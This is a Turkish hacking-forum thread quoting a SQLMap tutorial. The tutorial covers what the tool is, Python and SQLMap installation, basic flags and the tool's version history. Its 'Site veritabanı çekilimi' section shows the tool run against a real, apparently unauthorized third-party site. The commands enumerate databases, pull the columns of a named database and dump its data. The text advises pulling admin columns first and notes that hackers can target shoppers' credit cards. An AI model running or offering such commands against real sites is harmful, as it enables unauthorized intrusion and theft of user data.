SQLMap Kullanımı ve Genel İncelemesi \\ SolidStar - Quiklav

VITALLION

VITALLION

Özel Üye
12 Nis 2013
10,988
30
26
Hacknology' Alıntı:
http://www.turkhackteam.org/web-server-guvenligi/1171138-sqlmapi-tor-ile-kullan.html

Üstadın da bahsettiği gibi bu konunun çok çok çok daha derin parametreleri var. Bahsettiğiniz parametreler bile tam değil hatta, diğer yazınızda satır satır inceleyip eksiksiz yazmanız dileğiyle
Genişletmek için tıkla ...

Yorum için teşekkürler. Ancak başlıkta da belirttiğimiz gibi "Genel İnceleme" gerçekleştirdik. Derin bir inceleme gerçekleştirirsek adım adım inceleyerek belirteceğiz :)
 
ACE Veen

ACE Veen

Uzman üye
4 Şub 2023
1,121
568
Belirsiz
Quiklav' Alıntı:
Konu SolidStar ve Quiklav'ın ortak çalışması sonucu hazırlanmıştır.



1- SQLMap Nedir?



XPP966.jpg




SQLmap, Veritabanı'ndaki Otomatik Enjeksiyon işlemini gerçekleştirmek ve bunlardan veritabanına sızıp veri almaya çalışmak için kullanılan, açık kaynaklı bir SQL Enjeksiyon aracıdır.Hackerlar ve Pentesterlar arasında oldukça yaygın olan SQLMap, çeşitli amaçlarla kullanılmaktadır.Hackerlar genelde web sistemlerine ve kullanıcılara zarar vermek için kullanırken, Pentesterlar açık taraması ve güvenlik kontrolü için kullanmaktadır.



Günümüzde çoğunlukla, internetten alışveriş yapılmaktadır. SQLMap ile hackerlar, internetten alışveriş yapan insanların kredi kartlarını hedef alabilirler.



SQLMap, güvenlik açıklarını eşleştirmenin ve bulmanın yanı sıra, kullanıcıların, parolaların, yedeklerin, telefon numaralarının, e-posta adreslerinin, kredi kartlarının ve diğer gizli ve hassas bilgiler gibi tablolardaki verilerin düzenlenmesini silinmesini sağlar ve veritabanına erişime izin verir.



2- Desteklenen Platformlar



QVVv2V.png




SQLMap komut satırı üzerinden çalıştırılır ve farklı işletim sistemleri için indirilebilir. Linux, Windows ve Mac OS işletim sistemleri.



3- Kullanım Alanları ve Genel Kullanım Şekilleri





dOO8BL.png






[COLOR="#90b90"]SQLMap, MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird ve SAP MaxDB gibi birden çok veritabanı için tam destek sağlar.

Ayrıca SQLMap , Boolean, Error, Stuck, Time, Union enjeksiyon türlerinde tam destek vermektedir.



Yazılımın Unix ortamında standart kullanımı aşağıdaki gibidir:sqlmap -u "http://172.16.0.0/files/file.php?id=1"



Ek olarak çeşitli değerler kombine edilebilir:

--dbs: veritabanlarını görüntüler.

--tables: veritabanında tablolar görüntüler.

--columns: Veritabanında sütunlar görüntülenir.

--dump: DBMS veritabanı girişlerini dökecektir.



Yardım dosyasını görüntülemek için aşağıdaki komut da girilebilir :

sqlmap -h

[/COLOR]



4- KURULUM VE TEST



4.1 Kurulum



4.1.1 Pyhton kurulumu

[COLOR="3AA49"]Öncelikle pyhton kurmamız gerekiyor, ama çalıştırmak için sürümü 2.6x ve 2.7x arası olması gerekiyor. Çünkü diğer sürümleri sqlmap'e uymuyor.

Diyelim ki başka bir sürüm kurduk, peki ne olur? [/COLOR]



[COLOR="#a0fe0"]
Kod: 
[CRITICAL] incompatible Python version detected  ('3.6.4'). To successfully run sqlmap you'll have to use version 2.6.x  or 2.7.x (visit 'https://www.python.org/downloads/')



XPPBM7.jpg


Şeklinde hata verir.



Python 2.7.0 Release

linkinden indirelim, tabi ben windows'ta göstereceğim için windows olanı indiriyorum.

Kurulumu başlatalım,



bBBlV8.jpg




Install for all users dediğinizde bilgisayarınızdaki farklı bir oturum açtığınız hesap(lar) varsa, onlarada pyhton 2.7 sürümünü kurar.

Install just for me dediğinizde ise sadece kurulumda kullandığınız hesaba 2.7 sürümünü kurar.



Vrrl9n.jpg




Bu bölümde direk next ile kurulumda ilerler iseniz c: dizinine kurar, siz c: dizinine kurmasını istemiyorsanız burdan değiştirebilirsiniz.



Lbbplj.jpg




Burda yüklenecek paketleri görüyorsunuz, istemediğiniz bir paket varsa onun yüklenmesini iptal edebilirsiniz.[/COLOR]



766oQY.jpg




Disk Usage butonuna basarsnız disk kullanımına bakabilirsiniz.



İlerle dedikten daha sonra kurmaya başlayacak, dosyaları yükledikten sonra finish butonuna basıp kurulumu bitiriyoruz.



4.1.2 Sqlmap kurulumu



Şimdi sqlmap kurulumuna geçiyoruz.



İndirme linkleri:

Windows için .zip uzantılı olarak indirmek için tıklayınız.

GNU için .tar.gz uzantılı olarak indirmek için tıklayınız.



İnen zip dosyasının içinden dosyayı çıkartıp c: dizinine atıyoruz.





Dosya ismini kolaylık için "sqlmap" değiştirebilirsiniz, aksi hâlde cmd ile o dizine girerken "sqlmapproject-sqlmap-5ff54bf" olarak yazmanız gerekecek.

Sqlmap'i kurmuş olduk, kurulumu buraya kadardır.



4.2 Test



4.2.1 SQLMap başlatımı



komut istemini(cmd) açıyoruz, ilk önce c: dizinine gelmemiz gerekiyor.



Kod: 
Cd..



yazarak bulunduğumuz dizinden çıkıyoruz, daha sonra tekrar yazarak c: dizinine gelmiş oluyoruz.



Kod: 
Cd..



jyy4qm.jpg




Kod: 
Cd sqlmap



yazarak sqlmap dizinine geliyoruz,



LbbpRo.jpg




Ve böylece sqlmap'i çalıştırmış olduk.



4.2.2 Site veritabanı çekilimi



Şimdi bir siteye sızmayı deneyelim.



Kod: 
sqlmap.py -u https://sqlmapdenemesitesi.com/acikbulunantaraf?id= --dbs





Daha açık söyliyeyim ben site buldum hangi bölümünde açık varsa o bölümünün linkini aldım.



Kod: 
sqlmap.py -u http://www.f10products.co.za/index.php?id=5 --dbs





G99vGZ.jpg




Gördüğünüz gibi 2 tane veritabanına ulaştık,

Kod: 
sqlmap.py -u http://www.sqlmapdenemesitesi.com/acikbulunantaraf?id= -D Tablo-Adı --columns



Yani

Kod: 
sqlmap.py -u http://www.f10products.co.za/index.php?id=5 -D healts_db2 --columns





Kolonları çektik, şimdi içindeki verileri çekelim.

Kod: 
sqlmap.py -u http://www.sqlmapdenemesitesi.com/acikbulunantaraf?id= -D Tablo-Adı -C Kolon-Adı --dump



Kolon adında admin vb. yazıyorsa ilk onları çekin.



Daha sonra ise çekilen datalar geliyor.



Ve site veritabanını çekmiş olduk.



5- Özellikleri



bBBk6V.png




-DBMS kimlik bilgilerini, IP adresini, portu ve veritabanı adını sağlayarak doğrudan bir SQL enjeksiyonu olmadan veritabanı ile bağlantı sağlamak için destek.



-Kullanıcıları, hashleri, yönetici ayrıcalıklarını, veritabanlarını, tablolarını ve sütunlarını numaralandırmak için destek.



-Parola biçimlerinin otomatik olarak tanınması ve bunları sözlük tabanlı bir saldırı ile (BruteForce) kırma desteği.



- Veritabanı tablolarını ve bilgilerini tamamen çekme desteği.



-MySQL, PostgreSQL veya Microsoft SQL Server'da dosya sisteminin altında yatan veritabanı sunucusundan herhangi bir dosyayı indirip yüklemek için gerekli destek.



6- SQLMap'in Tarihi



5DDLyq.png




[COLOR="#0FCFF"]

  • SQLMap ilk olarak 25 Temmuz 2006 yılında SourceForge üzerinden geliştirildi. Temel versiyonunda MySQL için kısıtlı bir destek mevcuttu.

  • Ağustos 2006'da PostgreSQL'e destek eklendi ve sürüm 0.1 yayınlandı.

  • 13 Aralık 2006'da DBMS için geliştirmeler yapıldı ve 0.2 sürümü yayınlandı.

  • 20 Ocak 2007'de Microsoft SQL Server için ilk destek eklendi ve 0.3 sürümü yayınlandı.

  • 15 Haziran 2007'de DBMS için altyapı iyileştirmeleri yapıldı ve veritabanı sunucusundan belirli verileri numaralandırma eklenerek sürüm 0.4 yayınlandı.

  • Ocak 2008'de SQLMap , SourceForge'dan ayrıldı ve bir süre boyunca özel geliştirildi.

  • 1 Eylül 2008'de Debian ve Windows için özel geliştirmelerin sunulduğu 0.6 sürümü yayınlandı.

  • 2 Kasım 2008'de hata düzeltmelerinin uygulandığı sürüm 0.6.2 yayınlandı.

  • 18 Aralık 2008'de SQLMap, WebScarab proxy desteği ile 0.6.3 sürümüne güncellendi.

  • 3 Şubat 2009'da 0.6 alt tabanının son sürümü olan 0.6.4 yayınlandı. Bu sürümle birlikte hız açısından denge sağlanmış ve çeşitli hatalar giderilmiştir.

  • 22 Nisan 2009'da Me-t-a-sploit ile tam entegrasyon desteğine sahip, Microsoft Security Bulletin MS09-004 için Microsoft SQL Server 2000 ve 2005'e uygun olan sürüm 0.7'nin önizlemesi geliştirildi.

  • 25 Temmuz 2009'da SQLMap 0.7'nin kararlı sürümü geliştirildi.

  • 18 Aralık 2009'da 0.8 sürümünün önizlemesi aktif olarak geliştirilmeye başlandı.

  • Mart 2010'da SQLMap demo videoları yayınlanmaya başlandı.

  • 14 Mart 2010'da birçok yeni özelliğin sunulduğu SQLMap'in 0.8 kararlı sürümü yayınlandı. Bu özelliklerin arasında veritabanlarındaki tüm tabloları listelemek ve Me-t-a-sploit 3.3.3 ile tam entegrasyon mevcuttu.

  • Aralık 2010'da SQLMap'in 0.9 sürümünün kararsız versiyonu geliştirildi.

  • 10 Nisan 2011'de yeniden yazılmış güçlü bir SQL Enjeksiyon algılama motoru, doğrudan veritabanı sunucusuna bağlanma imkanı, zamana dayalı SQL Enjeksiyonu ve hata tabanlı SQL Enjeksiyon desteği sağlayan 0.9 sürümünün kararlı versiyonu geliştirildi.

  • 27 Şubat 2016'da 1.0 stabil versiyonu yayınlandı.

  • 2 Ocak 2017'de 1.1 stabil versiyonu yayınlandı. Bu versiyonda çeşitli hata düzeltmeleri mevcuttu.




[/COLOR]

Kurulum ve Test(4) : Quiklav



Anlatım ve İngilizce Aslından Çeviri(1,2,3,5,6) : SolidStar
Genişletmek için tıkla ...
eline sağlık hocam
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.